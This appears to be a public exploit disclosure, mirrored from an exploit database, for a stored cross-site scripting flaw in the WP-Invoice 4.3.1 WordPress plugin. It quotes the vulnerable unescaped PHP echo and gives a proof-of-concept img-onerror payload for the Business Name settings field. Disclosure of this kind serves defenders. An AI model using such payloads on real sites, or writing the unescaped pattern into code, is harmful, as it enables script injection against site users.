Exploit for WordPress WP-Invoice 4.3.1 Cross Site Scripting

## https://sploitus.com/exploit?id=PACKETSTORM:166824
# Exploit Title: WordPress Plugin WP-Invoice - Stored Cross Site Scripting  
# Date: 25-04-2022  
# Exploit Author: Mariam Tariq - HunterSherlock  
# Vendor Homepage: https://wordpress.org/plugins/WP-Invoice/  
# Version: 4.3.1  
# Tested on: Firefox  
# Contact me: mariamtariq404@gmail.com  
  
# Vulnerable Code:  
```  
wpi.business_name = '<?php echo ($wpi_settings['business_name']); ?>';  
``  
  
# POC  
1. Install the WP-Invoice WordPress plugin and activate it.  
2. Go to WP-Invoice settings and inside the Business Name field inject XSS  
payload “><img src=x onerror=alert(1)>  
3. XSS will trigger and will be stored.  
  
## POC Image  
  
https://imgur.com/rsHIEO9